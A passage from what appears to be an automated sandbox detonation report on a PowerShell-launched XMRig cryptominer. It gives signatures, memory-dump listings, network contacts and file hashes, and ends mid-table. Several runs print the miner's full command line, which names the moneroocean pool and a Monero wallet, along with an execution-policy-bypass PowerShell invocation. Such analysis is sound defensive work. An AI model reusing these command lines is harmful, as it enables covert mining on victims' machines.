| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 3440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5008 wrote to memory of 3440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
Files
memory/5008-3-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/5008-5-0x000001AF1A250000-0x000001AF1A272000-memory.dmp
memory/5008-8-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-9-0x000001AF1A400000-0x000001AF1A476000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djgysfnp.xsk.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5008-10-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-48-0x000001AF1A3E0000-0x000001AF1A3F2000-memory.dmp
memory/5008-61-0x000001AF1A3C0000-0x000001AF1A3CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3440-90-0x000001CCB1FE0000-0x000001CCB2000000-memory.dmp
memory/3440-91-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-92-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/5008-93-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/5008-94-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-95-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/3440-96-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-97-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-98-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-99-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-100-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-101-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-102-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-103-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-104-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-105-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-106-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-107-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-108-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-109-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-110-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-111-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-112-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-113-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-114-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-115-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-116-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-117-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-118-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-119-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-120-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-121-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-122-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-123-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-124-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-125-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-126-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-127-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-128-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-129-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-130-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-131-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-132-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-133-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-134-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-135-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-136-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-137-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-138-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-139-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-140-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-141-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-142-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-143-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-144-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-145-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-146-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-147-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-148-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-149-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-150-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-151-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-152-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-153-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-154-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-155-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
memory/3440-156-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:00
Platform
win11-20240508-en
Max time kernel
1653s
Max time network
1663s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/636-0-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2ifjlmu.tjm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/636-9-0x00000281BC4A0000-0x00000281BC4C2000-memory.dmp
memory/636-10-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/636-11-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/636-12-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/636-13-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/636-14-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:03
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4512 wrote to memory of 3176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4512 wrote to memory of 3176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/4512-4-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/4512-6-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/4512-5-0x00000264B24E0000-0x00000264B2502000-memory.dmp
memory/4512-7-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/4512-10-0x00000264B2690000-0x00000264B2706000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ggzvjwjv.j3g.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4512-26-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/4512-49-0x00000264B2810000-0x00000264B2822000-memory.dmp
memory/4512-62-0x00000264B2670000-0x00000264B267A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3176-93-0x00000273630E0000-0x0000027363100000-memory.dmp
memory/3176-94-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/4512-95-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/3176-96-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/4512-97-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/3176-98-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-99-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-100-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-101-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-102-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-103-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-104-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-105-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-106-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-107-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-108-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-109-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-110-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-111-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-112-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-113-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-114-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-115-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-116-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-117-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-118-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-119-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-120-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-121-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-122-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-123-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-124-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-125-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-126-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-127-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-128-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-129-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-130-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-131-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-132-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-133-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-134-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-135-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-136-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-137-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-138-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-139-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-140-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-141-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-142-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-143-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-144-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-145-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-146-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-147-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-148-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-149-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-150-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-151-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-152-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-153-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-154-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-155-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-156-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-157-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
memory/3176-158-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:15
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
